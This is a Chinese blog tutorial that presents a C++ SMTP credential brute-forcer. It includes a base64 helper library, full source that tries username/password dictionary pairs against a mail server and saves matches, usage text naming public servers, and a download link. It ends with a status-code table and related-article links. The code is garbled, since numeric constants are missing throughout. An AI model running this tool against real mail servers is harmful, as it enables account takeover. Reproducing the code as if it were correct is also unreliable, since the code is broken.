这里实现一个SMTP的暴力破解程序,实验搭建的是postfix服务器,猜解用户名字典(user.txt)和密码字典(password.txt)中匹配的用户名密码对,

程序开发环境是:

  WinXP VC6.0

参考资料:
SMTP-E-mail密码暴力破解: http://www.redicecn.com/html/yuanchuangchengxu/20090226/39.html
Encoding and decoding base 64 with c++: http://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp
这里要首先说明的是,参考资料“SMTP-E-mail密码暴力破解”中的base64算法存在问题,不能得到正确的结果,于是在网上找到了一个可以使用的base64的C++版的算法实现。而且,这个程序只能一次暴力猜解单个账户的密码。
另外提供一个在线的base64编码/解码以供检测: http://www1.tc711.com/tool/BASE64.htm

一、实验环境说明

  实验采用的是postfix服务器,关于邮件服务器的搭建这里就不做说明,需要费些功夫,网上也有很多的参考资料。

  邮箱域名是: mail.starnight.com   SMTP端口:25

  邮箱服务器内网地址是: 192.168.1.107  --  mail.starnight.com

  我们需要先修改一下hosts文件的内容:  C:\WINDOWS\system32\drivers\etc\hosts  -- winxp (其他系统请自己查找hosts文件位置)

  增加如下记录:格式如:

your-ip-address  domain-name
192.168.1.107    mail.starnight.com

  telnet上邮箱服务器(mail.starnight.com)的25号端口,并进行用户名密码验证。

  telnet mail.starnight.com 25

【说明】

1、helo/ehlo: 类似于跟远程服务器打招呼,但ehlo返回的消息更为丰富。

2、进行用户名密码认证:

auth login                  // 用户认证, 明文      
334 VXNlcm5hbWU6              // 服务器回传 状态码334 base64编码后的Username:
dGVzdDE=                   // base64编码的"test1"         
334 UGFzc3dvcmQ6              // 服务器回传 状态码334 base64编码后的Password:
MTIzNDU2                   // base64编码的"123456"
235 2.7.0 Authentication successful   //服务器回传状态吗235 认证成功

二、 Base64编码/解码算法C++实现

这里可以直接参考上面给出的链接,为了避免存在可能访问不了的情况,现斗胆照搬过来:

1、base64.h

#include <string>
std::string base64_encode(unsigned char const* , unsigned int len);
std::string base64_decode(std::string const& s);

2、base64.cpp

/*
base64.cpp and base64.h Copyright (C) 2004-2017 René Nyffenegger This source code is provided 'as-is', without any express or implied
warranty. In no event will the author be held liable for any damages
arising from the use of this software. Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions: 1. The origin of this source code must not be misrepresented; you must not
claim that you wrote the original source code. If you use this source code
in a product, an acknowledgment in the product documentation would be
appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be
misrepresented as being the original source code. 3. This notice may not be removed or altered from any source distribution. René Nyffenegger rene.nyffenegger@adp-gmbh.ch */ #include "base64.h"
#include <iostream> static const std::string base64_chars =
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789+/"; static inline bool is_base64(unsigned char c) {
return (isalnum(c) || (c == '+') || (c == '/'));
} std::string base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len) {
std::string ret;
int i = ;
int j = ;
unsigned char char_array_3[];
unsigned char char_array_4[]; while (in_len--) {
char_array_3[i++] = *(bytes_to_encode++);
if (i == ) {
char_array_4[] = (char_array_3[] & 0xfc) >> ;
char_array_4[] = ((char_array_3[] & 0x03) << ) + ((char_array_3[] & 0xf0) >> );
char_array_4[] = ((char_array_3[] & 0x0f) << ) + ((char_array_3[] & 0xc0) >> );
char_array_4[] = char_array_3[] & 0x3f; for(i = ; (i <) ; i++)
ret += base64_chars[char_array_4[i]];
i = ;
}
} if (i)
{
for(j = i; j < ; j++)
char_array_3[j] = '\0'; char_array_4[] = ( char_array_3[] & 0xfc) >> ;
char_array_4[] = ((char_array_3[] & 0x03) << ) + ((char_array_3[] & 0xf0) >> );
char_array_4[] = ((char_array_3[] & 0x0f) << ) + ((char_array_3[] & 0xc0) >> );
char_array_4[] = char_array_3[] & 0x3f; for (j = ; (j < i + ); j++)
ret += base64_chars[char_array_4[j]]; while((i++ < ))
ret += '='; } return ret; } std::string base64_decode(std::string const& encoded_string) {
int in_len = encoded_string.size();
int i = ;
int j = ;
int in_ = ;
unsigned char char_array_4[], char_array_3[];
std::string ret; while (in_len-- && ( encoded_string[in_] != '=') && is_base64(encoded_string[in_])) {
char_array_4[i++] = encoded_string[in_]; in_++;
if (i ==) {
for (i = ; i <; i++)
char_array_4[i] = base64_chars.find(char_array_4[i]); char_array_3[] = ( char_array_4[] << ) + ((char_array_4[] & 0x30) >> );
char_array_3[] = ((char_array_4[] & 0xf) << ) + ((char_array_4[] & 0x3c) >> );
char_array_3[] = ((char_array_4[] & 0x3) << ) + char_array_4[]; for (i = ; (i < ); i++)
ret += char_array_3[i];
i = ;
}
} if (i) {
for (j = i; j <; j++)
char_array_4[j] = ; for (j = ; j <; j++)
char_array_4[j] = base64_chars.find(char_array_4[j]); char_array_3[] = (char_array_4[] << ) + ((char_array_4[] & 0x30) >> );
char_array_3[] = ((char_array_4[] & 0xf) << ) + ((char_array_4[] & 0x3c) >> );
char_array_3[] = ((char_array_4[] & 0x3) << ) + char_array_4[]; for (j = ; (j < i - ); j++) ret += char_array_3[j];
} return ret;
}

3、test.cpp

#include "base64.h"
#include <iostream> int main() {
const std::string s =
"René Nyffenegger\n"
"http://www.renenyffenegger.ch\n"
"passion for data\n"; std::string encoded = base64_encode(reinterpret_cast<const unsigned char*>(s.c_str()), s.length());
std::string decoded = base64_decode(encoded); std::cout << "encoded: " << std::endl << encoded << std::endl << std::endl;
std::cout << "decoded: " << std::endl << decoded << std::endl; return ;
}

三、暴力破解程序实现

1、实现代码

  代码中添加了相当的注释,应该不难理解,跟原"SMTP-E-mail密码暴力破解"相比,不仅修正了base64算法,而且可以针对用户名字典-密码字典的暴力猜解。

#include <iostream>
#include <winsock2.h>
#include "base64.h" using namespace std; #pragma comment(lib, "ws2_32.lib") FILE *fpPass, *fpUser, *fpResult; // 文件描述符,用户名、密码文件、保存破解文件指针
SOCKET sock; // 套接字描述符
char send_wait(char *, char *, char); // 函数声明:发送数据并等待接受响应码
void usage(); // 程序使用说明
void initialsocket(); // 重置连接
struct sockaddr_in destAddr; // 目的地址 int main( int argc, char *argv[] )
{
WSADATA wsaData;
DWORD starttime; // 程序运行的起始时间
struct hostent *host; // 域名转换
char userFile[]; // 用户名字典文件
char passFile[]; // 密码字典文件路径
char username[]; // 用户名
char password[]; // 密码 int k = , i = , j = ; // 已读取密码文件行数
char *ICMP_DEST_IP; // DNS查询到的IP地址 memset(passFile, , sizeof(passFile));
memset(userFile, , sizeof(userFile));
// 打印使用帮助
if( == argc )
{
usage();
return -;
} for( i = ; i < argc; i++ )
{
// 用户名字典文件
if(strstr(argv[i], "-u"))
{
if(strlen(argv[i+]) > )
{
printf("用户名字典文件名太长!\n");
return ;
}
strncpy(userFile, argv[i+], strlen(argv[i+])); // 拷贝密码字典文件路径
i++;
}
// 密码字典文件
if(strstr(argv[i], "-p"))
{
if(strlen(argv[i+]) > )
{
printf("密码字典文件名太长!\n");
return ;
}
strncpy(passFile, argv[i+], strlen(argv[i+])); // 拷贝密码字典文件路径
i++;
}
if(strstr(argv[i], "-?")) // 帮助
{
usage();
return ;
}
} // 判断用户名和密码文件路径是否为空
if(strlen(userFile) == || strlen(passFile) == )
{
printf("请指定用户名和密码字典路径!\n");
usage();
return ;
} printf("userFile:%s \t passFile:%s\n", userFile, passFile); // 最后一个参数输入域名
ICMP_DEST_IP = argv[argc-]; if(WSAStartup(MAKEWORD(, ), &wsaData) != )
{
printf("套接字版本协商出错!\n");
WSACleanup();
return ;
} // 域名解析
host = gethostbyname(ICMP_DEST_IP);
if(NULL == host)
{
printf("无法解析主机%s的IP地址!\n", ICMP_DEST_IP);
WSACleanup();
return ;
}
else // 使用获取到的第一个IP地址
{
ICMP_DEST_IP = inet_ntoa(*(struct in_addr*)host->h_addr_list[]);
printf("server ip : %s\n", ICMP_DEST_IP);
} // 填写目的地址结构体: 协议、地址、端口 SMTP:25
memset(&destAddr, , sizeof(destAddr));
destAddr.sin_family = AF_INET;
destAddr.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
destAddr.sin_port = htons(); // 以只读打开用户名、密码文件、破解成功的结果 fpUser = fopen(userFile, "r");
fpResult = fopen("result.txt", "w"); if( NULL == fpUser )
{
printf("打开文件失败,请检查输入文件是否存在!\n");
WSACleanup();
return ;
} initialsocket(); // 初始化socket连接
starttime = GetTickCount(); // 获取当前偏移时间 memset(username, , sizeof(username));
while(fgets(username, , fpUser))
{
j++;
// username[strlen(username)-1] = '\0';
if(username[strlen(username)-]==0x0A)
username[strlen(username)-]=; memset(password, , sizeof(password));
fpPass = fopen(passFile, "r"); // 重新打开文件
while (fgets(password, , fpPass))
{
k++;
// password[strlen(password)-1] = '\0';
if(password[strlen(password)-]==0x0A)
password[strlen(password)-]=;
printf("%d:%d username:%s \t password:%s\n", j, k, username, password); //发送AUTH LOGIN命令,并起到接收响应码334
if(send_wait("AUTH LOGIN", "", ) != )
continue; if(send_wait(username, "", ) != )
continue; if(send_wait(password, "", ) != )
continue;
else
{
printf("------------ find a pair ---------------\n");
printf("username:%s \t password:%s\n", username, password);
printf("----------------------------------------\n"); // 将保存的结果写入到文件中
fputs(username, fpResult);
fputs(":", fpResult);
fputs(password, fpResult);
fputs("\n", fpResult); // 发送quit消息,退出登录状态,再初始化连接
if(send_wait("QUIT", "", ) != )
printf("disconnected failed!!!\n");
else
printf("disconnected from remote mail server...\n");
initialsocket(); memset(username, , sizeof(username));
break;
fclose(fpPass);
}
}
} printf("程序运行耗时:%ds:%dms\n", ((GetTickCount()-starttime)) / , ((GetTickCount()-starttime)) % );
fclose(fpPass);
closesocket(sock);
WSACleanup();
return ;
} /**
** 发送数据并等待接受响应码
** 参数说明: command: 发送的命令、 responseCode: 期待接受的响应码、 isEncode: 是否需要base64编码(1表示需要,0表示不需要)
** 返回值: -1:发送失败、 0:接收数据出错、 1:没有成功接收到响应码 、 2:成功接收到响应码
*/
char send_wait(char *command, char *responseCode, char isEncode)
{
// unsigned char *base64;
char smtp_data[]; // 提交给SMTP服务器的数据
char recvBuf[]; // 接收数据缓冲区
DWORD starttime; // 开始时间
memset(smtp_data, , sizeof(smtp_data));
if(isEncode) // 需要进行base64编码
{
std::string encoded = base64_encode(reinterpret_cast<const unsigned char*>((string(command).c_str())), string(command).length());
printf("encode : %s\n", encoded.c_str());
strcpy(smtp_data, encoded.c_str());
} else
{
strcpy(smtp_data, command);
} // 加上换行符
smtp_data[strlen(smtp_data)] = 0x0D;
smtp_data[strlen(smtp_data)] = 0x0A; if(SOCKET_ERROR == send(sock, smtp_data, strlen(smtp_data), ))
{
printf("发送请求出错!\n");
return -;
}
memset(recvBuf, , sizeof(recvBuf));
starttime = GetTickCount();
while()
{
// 设置2s的超时时间
if(GetTickCount() - starttime > )
{
printf("timeout...\n");
return ;
} if(SOCKET_ERROR == recv(sock, recvBuf, , ))
{
printf("接收信息出错");
return ;
}
else
{
printf("recvBuf:==# %s \n", recvBuf);
if(NULL == strstr(recvBuf, responseCode))
{
if(strstr(recvBuf, "") || strstr(recvBuf, ""))
initialsocket(); // 重置socket连接
return ;
}
else
return ;
}
}
} // 程序使用说明
void usage()
{
printf("============================E-mail密码暴力破解工具=============================\n");
printf("By RedIce:redice@see.xidian.edu.cn\n");
printf("Modified by starnight(starnight_cyber@foxmail.com) -- 2017.3.31 \n");
printf("注意:国内部分SMTP服务器有防暴力破解设置(eg. smtp.126.com)\n");
printf("================================================================================\n");
printf("Usage: SMTPBruteForce.exe -u pathToUsername -p pathToPassword smtpServerAddress\n");
printf("Options:\n\n");
printf(" -u pathToUsername:指定用户名字典文件\n");
printf(" -f pathToPassword:指定密码字典文件\n");
printf(" -? 显示该帮助信息\n\n");
printf(" smtpServerAddress: 邮箱服务器地址,如smtp.qq.com\n");
} void initialsocket()
{
char recvBuf[]; // 接收服务器返回数据缓冲区
int timeout = ;
closesocket(sock);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); // 创建套接字
if(INVALID_SOCKET == sock)
{
printf("创建套接字出错!\n");
WSACleanup();
exit();
} // 连接目标主机
if(SOCKET_ERROR == connect(sock, (SOCKADDR*)&destAddr, sizeof(destAddr)))
{
printf("连接目标主机失败!.\n");
closesocket(sock);
WSACleanup();
exit();
} // 设置超时时间
if(SOCKET_ERROR == setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout)))
{
printf("设置套接字超时失败!.\n");
closesocket(sock);
WSACleanup();
exit();
} memset(recvBuf, , sizeof(recvBuf));
if(SOCKET_ERROR == recv(sock, recvBuf, , ))
{
printf("接收连接信息出错!.\n");
closesocket(sock);
WSACleanup();
exit();
}
else {
if(strstr(recvBuf, ""))
{
printf("该服务器有防暴力破解设置,您的IP地址被临时禁制连接,请稍后再试...\n");
printf("From SMTP Server : \n%s\n", recvBuf);
closesocket(sock);
WSACleanup();
exit();
}
}
// 发送"EHLO starnight.com"命令,并期待接收响应码250
send_wait("EHLO mail.starnight.com", "", );
}

2、使用方法说明Usage:

Usage: SMTPBruteForce.exe  -u pathToUsername -p pathToPassword smtpServerAddress

Options:

        -u pathToUsername:指定用户名字典文件
-f pathToPassword:指定密码字典文件
-? 显示该帮助信息 smtpServerAddress: 邮箱服务器地址,如smtp.qq.com

3、暴力破解测试

C:\code\SMTPBruteForce\Debug>SMTPBruteForce.exe -u user.txt -p password.txt mail.starnight.com

实验结果截图:

值得说明的是,这种验证方式会比较慢...

源代码百度云分享: 链接: https://pan.baidu.com/s/1o88st66 密码: ubvw

四、SMTP状态码

Code    Meaning
(nonstandard success response, see rfc876)
System status, or system help reply
Help message
<domain> Service ready
<domain> Service closing transmission channel
Requested mail action okay, completed
User not local; will forward to <forward-path>
Cannot VRFY user, but will accept message and attempt delivery
Start mail input; end with <CRLF>.<CRLF>
<domain> Service not available, closing transmission channel
Requested mail action not taken: mailbox unavailable
Requested action aborted: local error in processing
Requested action not taken: insufficient system storage
Syntax error, command unrecognised
Syntax error in parameters or arguments
Command not implemented
Bad sequence of commands
Command parameter not implemented
<domain> does not accept mail (see rfc1846)
Access denied (???a Sendmailism)
Requested action not taken: mailbox unavailable
User not local; please try <forward-path>
Requested mail action aborted: exceeded storage allocation
Requested action not taken: mailbox name not allowed
Transaction failed

SMTP状态码:

http://www.greenend.org.uk/rjk/tech/smtpreplies.html

https://tools.ietf.org/rfc/rfc4954.txt

中文参考:

http://blog.sina.com.cn/s/blog_648d85ef0100yg1t.html

http://www.codeweblog.com/smtp%E7%8A%B6%E6%80%81%E7%A0%81/

最后,欢迎大家跟我交流!

SMTP暴力破解的更多相关文章

  1. Fail2ban 防止暴力破解centos服务器的SSH或者FTP账户

    次尝试登陆root账户失败的情况.[说明服务器被攻击了]   logtarget = SYSLOG  #我们需要做的就是把这行改成/var/log/fail2ban.log,方便用来记录日志信息 so ...

  2. centos 7 DenyHosts 安装 防暴力破解ssh登陆

    为了减少软件扫描ssh登陆 还是用这个比较好点  默认端口号22 也要改 登陆密码也不要使用 弱口令 123456 这样的 Description DenyHosts is a python prog ...

  3. 防止服务器被暴力破解使用DenyHosts

    公司有台服务器被坏人盯上了,通过日志可以看到一直在做暴力破解ssh. 防止服务器被暴力破解使用DenyHosts 参考链接: 防止ssh破解,Ubuntu安装denyhosts的一些问题 防止你的ss ...

  4. Linux 利用hosts.deny 防止暴力破解ssh(转)

    一.ssh暴力破解 利用专业的破解程序,配合密码字典.登陆用户名,尝试登陆服务器,来进行破解密码,此方法,虽慢,但却很有效果. 二.暴力破解演示 2.1.基础环境:2台linux主机(centos 7 ...

  5. Linux 安装DenyHost防止ssh被暴力破解

    DenyHosts介绍 当你的linux服务器暴露在外网当中时,服务器就极有可能会遭到互联网上的扫描软件进行扫描,然后试图连接ssh端口进行暴力破解(穷举扫描).如果遇到这个问题,一款非常有用的工具D ...

  6. Web攻防之暴力破解(何足道版)

    原创文章 原文首发我实验室公众号 猎户安全实验室 然后发在先知平台备份了一份 1 @序 攻防之初,大多为绕过既有逻辑和认证,以Getshell为节点,不管是SQL注入获得管理员数据还是XSS 获得后台 ...

  7. fail2ban的使用以及防暴力破解与邮件预警

    fail2ban可以监视你的系统日志,然后匹配日志的错误信息(正则式匹配)执行相应的屏蔽动作(一般情况下是防火墙),而且可以发送e-mail通知系统管理员! fail2ban运行机制:简单来说其功能就 ...

  8. fail2ban 防暴力破解总结

    公司服务器安全问题一直是个令人头疼的问题,许多运维的小伙伴一直在用脚本来监控服务器登录状态,然而脚本编写比较麻烦,今天就给大家推荐一款小而精致的防暴力破解工具 fail2ban ,他可以监控系统日志, ...

  9. Linux 利用hosts.deny 防止暴力破解ssh

    一.ssh暴力破解 利用专业的破解程序,配合密码字典.登陆用户名,尝试登陆服务器,来进行破解密码,此方法,虽慢,但却很有效果. 二.暴力破解演示 2.1.基础环境:2台linux主机(centos 7 ...

随机推荐

  1. inux下mysql的root密码忘记解决方法

    1.首先确认服务器出于安全的状态,也就是没有人能够任意地连接MySQL数据库. 因为在重新设置MySQL的root密码的期间,MySQL数据库完全出于没有密码保护的 状态下,其他的用户也可以任意地登录 ...

  2. Win server 2016 升级 Win server 2019 [测试验证]

    . 给win server 2016 挂在 win server 2019 的安装盘 2. 点击setup 直接进行安装操作  选择不下载更新, 然后到达输入序列号的界面 序列号为: WMDGN-G9 ...

  3. phpcms 发布时间 更新 时间

  4. Spring-MVC理解之二:前置控制器

    原文链接:http://www.cnblogs.com/brolanda/p/4265749.html 一.前置控制器配置与讲解 上篇中理解了IOC容器的初始化时机,并理解了webApplicatio ...

  5. excel表中判断A列与B列内容是否相同,相同的话在C列按条件输出!

    判断两列数据是否相同,有以下几个函数判断(做笔记于此,方便以后查找): 1.=IF(AND(A4=B4),"相同","") 在C列输出相同字符 2.=IF(A1 ...

  6. 博客搬家 --- CSDN

    博客园好久没维护了,搬家吧 欢迎移步到新博客

  7. java catch 捕获异常后会产生一个实例对象 该对象能使用父类的方法

  8. 【ListBox】ListBox的相关操作

    Winform中两个listbox的操作是平时比较常用的操作. 本次将以一个Winform实例来分享一下两个listbox的操作,包括:listbox添加项,项的上移下移等操作. 假设有两个listb ...

  9. tyvj1305 最大子序和 【单调队列优化dp】

    描述 输入一个长度为n的整数序列,从中找出一段不超过M的连续子序列,使得整个序列的和最大. 例如 1,-3,5,1,-2,3 当m=4时,S=5+1-2+3=7 当m=2或m=3时,S=5+1=6 输 ...

  10. CF 566A Matching Names

    CF 566A Matching Names 题目描述 给出n个名字和n个昵称,求一个名字和昵称的劈配方案,使得被劈配的名字和昵称的最长公共前缀长度的和最大. 1<=n<=100000 字 ...